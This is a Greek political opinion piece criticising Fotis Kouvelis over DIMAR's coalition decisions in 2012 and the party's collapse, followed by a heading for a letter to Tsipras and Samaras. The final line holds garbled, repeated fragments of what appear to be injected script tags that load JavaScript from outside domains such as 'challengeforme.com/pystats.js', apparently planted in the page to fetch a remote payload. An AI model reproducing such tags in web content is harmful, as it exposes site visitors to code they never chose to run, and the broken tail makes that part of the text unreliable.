Αχ Φώτη, μωρέ Φώτη… Του Θαλή Κουτούπη

0046

Τριπλό και μεγάλο κακό έχει προκαλέσει στην Ελλάδα και στην ανανεωτική αριστερά ο Φώτης Κουβέλης, σίγουρα άθελά του, δέσμιος ξεπερασμένων στερεότυπων!

1.- Δεν έστερξε να συμμεθέξει σε συγκυβέρνηση μετά τις εκλογές του Μαΐου 2012, θέτοντας ως όρο να συμμετέχει κι ο ΣΥΡΙΖΑ! Αν το είχε κάνει, η χώρα θα είχε αποφύγει πρόσθετη προεκλογική παραλυσία και δαπάνες κι ο ΣΥΡΙΖΑ θα είχε μείνει στο 13%.
2.- Έφυγε απ’ τη συγκυβέρνηση του Ιουνίου, αφού προηγουμένως είχε εντάξει σ’ αυτή, δυο ανεπαρκέστατα όπως αποδείχθηκε “συντεχνιακής νοοτροπίας” στελέχη του (Α. Ρουπακιώτης – Α. Μανιτάκης), που έκαναν ό,τι μπορούσαν για να υπονομεύσουν ή να καθυστερήσουν σημαντικές μεταρρυθμίσεις. Κι όμως είχε στελέχη όπως ο Σ. Λυκούδης, ο Ν. Τσούκαλης, ο Γρ. Ψαριανός (αρκεί να έβγαζε το αμπέχονο κυριολεκτικά και μεταφορικά!…), που θα μπορούσαν να προσφέρουν σημαντικό έργο.
3.- Με παλινωδίες, άκαιρους και άστοχους εγωισμούς και δολιχοδρομίες, διέλυσε τη ΔΗΜΑΡ, αυτό το υγιές αριστερό κόμμα, πολύτιμο για το ελληνικό πολιτικό σκηνικό!

ΕΠΙΣΤΟΛΗ ΑΛΚΙΒΙΑΔΗ ΠΡΟΣ ΑΛ. ΤΣΙΠΡΑ & ΑΝΤ. ΣΑΜΑΡΑ

ΑΛΚΙΒΙΑΔΗΣ0001___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >